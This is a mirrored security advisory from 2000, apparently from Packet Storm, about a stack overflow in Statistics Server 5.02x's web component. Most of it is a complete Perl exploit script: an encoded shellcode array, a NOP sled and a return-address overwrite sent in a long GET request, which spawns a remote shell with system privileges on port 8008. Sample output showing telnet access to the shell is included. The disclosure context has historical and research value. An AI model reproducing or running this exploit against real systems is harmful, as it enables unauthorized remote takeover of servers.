Lucene search

K

ssexploit502x.pl

🗓️ 13 Aug 2000 00:00:00Reported by nemoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Statistics Server 5.02x allows arbitrary code execution via a stack overflow in web component.

Show more
Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Statistics Server 5.02x overflow  
  
Advisory Name: Statistics Server Live Stats  
Advisory Released: [00/08/10]  
Application: Web site traffic analyzer  
Severity: local/remote user can run arbitrary  
code with WebServer privileges  
Status: vendor contacted  
Authors: Nemo - [email protected]  
|Zan - [email protected]  
WWW: http://www.deepzone.org  
http://deepzone.cjb.net  
  
  
___________________________________________________________________  
  
  
OVERVIEW  
  
'Statistics Server is far more than just another log analyzer. It  
analyzes Web site traffic in "Real-time" and generates "Live Stats"  
reports in an easy to use Web interface.'  
  
'The ability of Statistics Server to deliver Live Web statistics for  
high volume installations has made it an essential component of  
many corporate Internet and Intranet Web sites and ISP Web hosting  
installations.'  
  
___________________________________________________________________  
  
BACKGROUND  
  
Statistics Server 5.02x ships with a stack overflow in its web  
component. It *lets run arbitrary code inside* by local/remote user.  
  
Tests, ideas & exploits were tested against Win2k/Spanish version  
and WinNT 4.0/sp6a Spanish version.  
  
Web server runs like a system service with a default installation.  
  
___________________________________________________________________  
  
DETAILS  
  
Web server can't handle long requests correctly. When a long GET  
(about 2033 bytes) request is made. It dies with EIP overwritten.  
  
It lets run arbitrary code with web servers privileges (system  
privileges by default).  
  
  
___________________________________________________________________  
  
EXPLOIT  
  
It spawns a remote winshell on 8008 port. It doesn't kill webserver  
so webserver continues running while hack is made. When hack is  
finished webserver will run perfectly too.  
  
ex.  
  
$ lynx http://vulnerable.com  
  
Server Selection  
Please Enter Server ID _____________ GO  
  
....  
  
  
$ ./ssexploit502x.pl vulnerable.com 80  
  
  
(c) Deep Zone - Statistics Server 5.02x's exploit  
  
Coded by |Zan - [email protected]  
  
-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-  
  
  
spawning remote shell on port 8008 ...  
  
HTTP/1.0 302  
Server: Statistics Server 5.0  
Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
... ... ... ... ... ... ...  
  
Content-Type: text/html  
Connection: Keep-Alive  
Content-Lenght: 0  
  
... done.  
  
$ lynx http://vulnerable.com (It continues working }:)  
  
Server Selection  
Please Enter Server ID _____________ GO  
  
....  
  
$ telnet vulnerable.com 8008  
  
Trying vulnerable.com...  
Connected to vulnerable.com.  
Escape character is '^]'.  
  
Microsoft Windows 2000 [Version 5.00.2195]  
(C) Copyright 1985-1999 Microsoft Corp.  
  
D:\StatisticsServer>  
  
  
___________________________________________________________________  
  
FIXES/PATCHES  
  
We contacted Statistics Server support in http://www.mediahouse.com  
six weeks ago.  
  
Firstly they told us that new release didn't contain any bof bug.  
When we sent a DoS source they told us that new release could have  
some problem and it will be fixed in next new release, while we will  
be kept to update with fix progress.  
  
We weren't contacted again. Any news about mediahouse.com  
  
Two days ago we email them again asking them about patchs, fixes  
and progress. We haven't any reply.  
  
___________________________________________________________________  
  
  
EXPLOIT SOURCE  
  
bug was discovered by Nemo - [email protected] while auditing a  
very important spanish ISP (others affected).  
  
bug was exploited by |Zan - [email protected]  
  
exploit works against Win2k/Statistics Server 5.02x running like  
service.  
  
  
  
#!/usr/bin/perl -w  
# Statistics Server 5.02x's exploit.  
# usage: ./ssexploit502x.pl hostname port  
# 00/08/10  
# http://www.deepzone.org  
# http://deepzone.cjb.net  
# http://mareasvivas.cjb.net (|Zan homepage)  
#  
# --|Zan <[email protected]>  
# ----------------------------------------------------------------  
#  
# This exploit works against Statistics Server 5.02x/Win2k.  
#  
# Tested with Win2k (spanish version).  
#  
# It spawns a remote winshell on 8008 port. It doesn't kill  
# webserver so webserver continues running while hack is made.  
# When hack is finished webserver will run perfectly too.  
#  
# Default installation gives us a remote shell with system  
# privileges.  
#  
# overflow discovered by  
# -- Nemo <[email protected]>  
#  
# exploit coded by  
# -- |Zan <[email protected]>  
#  
# ----------------------------------------------------------------  
  
use IO::Socket;  
  
  
@crash = (  
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",  
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",  
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",  
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",  
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",  
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",  
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",  
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",  
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",  
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",  
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",  
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",  
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",  
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",  
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",  
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",  
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",  
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",  
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",  
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",  
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",  
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",  
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",  
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",  
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",  
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",  
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",  
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",  
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",  
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",  
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",  
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",  
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",  
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",  
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",  
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",  
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",  
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",  
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",  
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",  
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",  
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",  
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",  
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",  
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",  
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",  
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",  
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",  
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",  
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",  
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",  
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",  
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",  
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",  
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",  
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",  
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",  
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",  
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",  
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",  
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",  
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",  
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",  
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",  
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",  
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",  
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",  
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",  
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",  
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",  
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",  
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",  
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",  
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",  
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",  
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",  
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",  
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",  
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",  
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",  
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",  
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",  
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",  
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",  
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",  
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",  
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",  
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",  
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",  
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",  
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",  
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",  
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",  
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",  
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",  
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",  
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",  
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",  
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",  
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",  
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",  
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",  
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",  
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",  
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");  
  
  
# ----------------------------------------------------------------  
  
  
sub pcommands  
{  
die "usage: $0 hostname port\n" if (@ARGV != 2);  
($host) = shift @ARGV;  
($port) = shift @ARGV;  
}  
  
sub show_credits  
{  
print "\n\n\t (c) 2000 Deep Zone - Statistics Server  
5.02x's";  
print "exploit\n\n\t\t Coded by |Zan -  
izan\@deepzone.org\n";  
print "\n\t-=[ http://www.deepzone.org -  
http://deepzone.cjb";  
print ".net ]=-\n\n";  
}  
  
sub bofit  
{  
  
print "\nspawning remote shell on port 8008 ...\n\n";  
  
$s = IO::Socket::INET->new(PeerAddr=>$host,  
PeerPort=>$port,  
Proto=>"tcp");  
  
if(!$s) { die "error.\n"; }   
  
print $s "GET http://O";  
  
foreach $item (@crash) {  
print $s $item  
}  
  
for ($cont=0; $cont<840;$cont++) {  
print $s "\x90"  
}  
  
print $s "\x8c\x3e\x1d\x01";  
  
print $s "\r\n\r\n";  
  
while (<$s>) { print }  
  
print "... done.\n\n";  
  
}  
  
# ----- begin  
  
show_credits;  
pcommands;  
bofit;  
  
# ----- that's all :)  
  
  
___________________________________________________________________  
  
GREETINGS  
  
Attrition, beavuh, ADM, Technotronic, b0f .... and of course ....  
  
RFP and Wiretrip  
  
  
-- ] EOF  
  
- --  
|Zan / DeepZone (tm) - Digital Security Center  
http://www.deepzone.org - http://mareasvivas.cjb.net  
  
PGP key fingerprint:  
AD 97 A6 AB DC BB D2 CF 89 AE 0A 88 7E 5D 9D 97 BB F6 B0 B8  
  
- --=[ ... toda la vida buscando respuestas ... y cuando por fin  
las encuentras ... cambian las preguntas ]=--  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>  
  
iQA/AwUBOZL7j35dnZe79rC4EQKNBgCg50QJs6JqKM0gOjBJ+KfaQ7lWAnwAnAkI  
IS4fs41nCvWP7tULf0KwU0m8  
=Gnrm  
-----END PGP SIGNATURE-----  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo